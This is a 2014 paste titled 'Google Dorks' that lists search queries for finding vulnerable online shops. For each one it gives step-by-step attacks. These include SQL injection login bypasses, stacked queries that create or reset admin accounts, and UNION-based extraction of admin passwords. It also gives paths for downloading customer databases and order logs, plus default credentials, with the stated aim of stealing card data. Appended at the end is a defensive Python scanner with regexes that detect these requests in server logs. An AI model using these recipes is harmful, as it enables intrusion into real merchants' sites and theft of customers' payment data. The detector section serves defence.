Kyfx

Google Dorks

Nov 23rd, 2014
  1. Kyfx
  2.  
  3. Hacking CC with Google dork 2013 but might work in 2014 of vulnerability
  4.  
  5. 1:
  6. google dork :--> inurl:"/cart.php?m="
  7. target looks like :--> ...cart.php?m=view
  8. exploit: change cart.php?m=view to /admin
  9. target with exploit :-->
  10. Username : 'or"="
  11. Password : 'or"=
  12.  
  13. 2:
  14. google dork :--> allinurlroddetail.asp?prod=
  15. target looks like :--> xxxxx.org (big letters and numbers )
  16. exploit :--> change the proddtail.asp?prod=SG369 with fpdb/vsproducts.mdb
  17. target with exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb
  18.  
  19. 3:
  20. google dork :--> allinurl: /cgi-local/shopper.cgi
  21. target looks like :--> ....dd=action&key=
  22. exploit :--> ...&template=order.log
  23. target with exploit :--> .....late=order.log
  24.  
  25. 4:
  26. google dork :--> allinurl: Lobby.asp
  27. target looks like :--> www.xxxxx.com/mall/lobby.asp
  28. exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
  29. target with exploit :--> www.xxxxx.com/fpdb/shop.mdb
  30.  
  31. 5:
  32. google dork :--> allinurl:/vpasp/shopsearch.asp
  33. when u find a target put this in search box
  34. Keyword=&category=5); insert into tbluser (fldusername) values
  35. ('')--&SubCategory=&hide=&action.x=46&action.y=6
  36. Keyword=&category=5); update tbluser set fldpassword='' where
  37. fldusername=''--&SubCategory=All&action.x=33&action.y=6
  38. Keyword=&category=3); update tbluser set fldaccess='1' where
  39. fldusername=''--&SubCategory=All&action.x=33&action.y=6
  40. Don't forget to replace and ; the values are up to you.
  41. To change the admin password, enter the following keyword:
  42. Keyword=&category=5); update tbluser set fldpassword='' where
  43. fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
  44.  
  45. login page:
  46.  
  47. 6:
  48. google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
  49. target looks like :--> ....asp?cat=xxxxxx
  50. exploit :--> ...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
  51. if this is not working, try these endings:
  52. %20'a%25'--
  53. %20'b%25'--
  54. %20'c%25'--
  55. after finding user and pass go to login page:
  56.  
  57. 7:
  58. google dork :--> allinurl:/shopadmin.asp
  59. target looks like :--> www.xxxxxx.com/shopadmin.asp
  60. exploit:
  61. user : 'or'1
  62. pass : 'or'1
  63.  
  64. 8:
  65. google.com :--> allinurl:/store/index.cgi/page=
  66. target looks like :--> ....shortblue.htm
  67. exploit :--> ../admin/files/order.log
  68. target with exploit :--> .c....iles/order.log
  69.  
  70. 9:
  71. google.com:--> allinurl:/metacart/
  72. target looks like :--> www.xxxxxx.com/metacart/about.asp
  73. exploit :--> /database/metacart.mdb
  74. target with exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb
  75.  
  76. 10:
  77. google.com:--> allinurl:/DCShop/
  78. target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
  79. exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
  80. target with exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt
  81.  
  82. 11:
  83. google.com:--> allinurl:/shop/category.asp/catid=
  84. target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
  85. exploit :--> /admin/dbsetup.asp
  86. target with exploit :--> www.xxxxxx.com/admin/dbsetup.asp
  87. after getting that page, look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
  88. target for downloading the database :--> www.xxxxxx.com/data/pdshoppro.mdb (doesn't need to be like this)
  89. in db look for access to find pass and user of shop admins.
  90.  
  91. 12:
  92. google.com:--> allinurl:/commercesql/
  93. target looks like :--> www.xxxxx.com/commercesql/xxxxx
  94. exploit :--> cgi-bin/commercesql/index.cgi?page=
  95. target with exploit admin config :--> ..../adminconf.pl
  96. target with exploit admin manager :--> ....in/manager.cgi
  97. target with exploit order.log :--> ....iles/order.log
  98.  
  99. 13:
  100. google.com:--> allinurl:/eshop/
  101. target looks like :--> www.xxxxx.com/xxxxx/eshop
  102. exploit :-->/cg-bin/eshop/database/order.mdb
  103. target with exploit :--> ....base/order.mdb
  104. after dl the db look at access for user and password
  105.  
  106. 14:
  107. 1/ search google: allinurl:"shopdisplayproducts.asp?id=
  108. --->=5
  109.  
  110. 2/ find error by adding '
  111. --->=5'
  112.  
  113. --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
  114.  
  115. -If you don't see error then change id to cat
  116.  
  117. --->=5'
  118.  
  119. 3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sppassword
  120.  
  121. --->...on%20select%20 1%20from%20tbluser"having%201=1--sppassword
  122.  
  123. --->error: 5' union select 1 from tbluser "having 1=1--sppassword.... The number of columns in the two selected tables or queries of a union query do not match......
  124.  
  125. 4/ add 2,3,4,5,6.......until you see a nice table
  126.  
  127. add 2
  128. ---->...on%20select%20 1,2%20from%20tbluser"having%201=1--sppassword
  129. then 3
  130. ---->...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sppassword
  131. then 4 ---->...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sppassword
  132.  
  133. ...5,6,7,8,9.... until you see a table. (exp:...47)
  134.  
  135. ---->...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sppassword
  136. ---->see a table.
  137.  
  138. 5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
  139.  
  140. --->...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sppassword
  141.  
  142. 6/ Find link admin to login:
  143. try this first:
  144. or:
  145.  
  146. Didn't work? then u have to find yourself:
  147.  
  148. add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
  149.  
  150. --->...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
  151.  
  152. you'll see something like: ( lot of them)
  153.  
  154. shopaddmoretocart.asp
  155. shopcheckout.asp
  156. shopdisplaycategories.asp
  157. ..............
  158.  
  159. then guess admin link by adding the above data until you find admin links
  160.  
  161. 15:
  162. xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
  163. the most important thing here is xDatabase
  164. xDatabase: shopping140
  165. ok now the URL will be like this:
  166. ****://.victim.com/shop/shopping140.mdb
  167. if you didn't download the Database..
  168. Try this while there is dblocation.
  169. xDblocation
  170. resx
  171.  
  172. the url will be:
  173. ****://.victim.com/shop/resx/shopping140.mdb
  174. If u see the error message you have to try this :
  175. ****://.victim.com/shop/shopping500.mdb
  176.  
  177. download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
  178.  
  179. inside you should be able to find *** information.
  180. and you should even be able to find the admin username and password for the website.
  181.  
  182. the admin login page is usually located here
  183. ****://.victim.com/shop/shopadmin.asp
  184.  
  185. if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
  186.  
  187. Username: admin
  188. password: admin
  189. OR
  190. Username: vpasp
  191. password: vpasp
  192.  
  193. Hope you enjoy this !!
  194.  
  195.  
  196.  
  197.  
  198. 2013...
  199.  
  200. Kyfx
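
From the defender's side, the requests this paste describes leave recognisable traces in web-server access logs. The following is an added example, not part of the original paste: it scans access-log lines for the database-file, order-log, setup-page and SQL-injection request patterns listed above and separates probes from requests the server answered with a 2xx status. The rule names, log lines and addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Client, request target and status of a common/combined access-log entry.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3}) ')

# Rules derived from the request patterns listed in the paste (names are hypothetical).
RULES = [
    ("db-file-download", re.compile(r"\.mdb(?:$|\?)", re.I)),
    ("order-log-read", re.compile(r"order\.log|/orders/orders\.txt", re.I)),
    ("setup-page", re.compile(r"/admin/dbsetup\.asp", re.I)),
    ("sqli-union", re.compile(r"union\s+select", re.I)),
    ("sqli-stacked", re.compile(r"\)\s*;\s*(?:insert|update)\s", re.I)),
    ("sqli-user-table", re.compile(r"\btbluser\b", re.I)),
]

def decode(target):
    """Percent-decode repeatedly (bounded) so double-encoded requests still match."""
    for _ in range(3):
        nxt = unquote(target.replace("+", " "))
        if nxt == target:
            break
        target = nxt
    return target

def scan(lines):
    """Return (client, rule, status, severity) for every rule hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line this parser understands
        client, target, status = m.group(1), decode(m.group(2)), int(m.group(3))
        for name, rx in RULES:
            if rx.search(target):
                # A 2xx answer means the server served the file or ran the request.
                sev = "exposed" if 200 <= status < 300 else "probe"
                hits.append((client, name, status, sev))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [23/Nov/2014:10:00:01 +0000] "GET /fpdb/shop.mdb HTTP/1.1" 200 48213 "-" "-"',
    '198.51.100.7 - - [23/Nov/2014:10:00:05 +0000] "GET /vpasp/shopdisplayproducts.asp'
    '?cat=5%2520union%2520select%25201%2520from%2520tbluser HTTP/1.1" 500 312 "-" "-"',
    '203.0.113.5 - - [23/Nov/2014:10:00:09 +0000] "GET /store/index.cgi?page=../admin/files/order.log HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.44 - - [23/Nov/2014:10:00:12 +0000] "GET /shop/category.asp?catid=12 HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

An "exposed" hit on `db-file-download` or `order-log-read` means the file was served from the web root and should be treated as a data disclosure, not just a scan.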